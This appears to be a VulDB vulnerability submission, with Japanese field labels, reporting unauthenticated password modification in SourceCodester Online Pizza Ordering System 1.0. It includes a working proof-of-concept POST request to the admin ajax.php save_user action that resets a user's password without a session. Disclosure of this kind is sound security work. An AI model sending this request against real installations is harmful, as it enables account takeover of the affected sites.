| タイトル | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 Unauthorized Password Modification |
|---|
| 説明 | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 has an Unauthorized Password Modification vulnerability, the vulnerability is due to access control weakness. Remote and unauthenticated attacker can change the password directly without login.
There is a poc below :
POST /php-opos/admin/ajax.php?action=save_user HTTP/1.1
*********************************(without cookie in header)
id=2&name=Staff&username=staff&password=abcdefg&type=2
Then the password will be changed to 'abcdefg' without authentication. |
|---|
| ソース | ⚠️ https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| ユーザー | WWesleywww (UID 43117) |
|---|
| 送信 | 2023年03月17日 08:33 (3 年 ago) |
|---|
| モデレーション | 2023年03月17日 08:51 (17 minutes later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 223305 [SourceCodester Online Pizza Ordering System 1.0 Password Change ajax.php?action=save_user 弱い認証] |
|---|
| ポイント | 20 |
|---|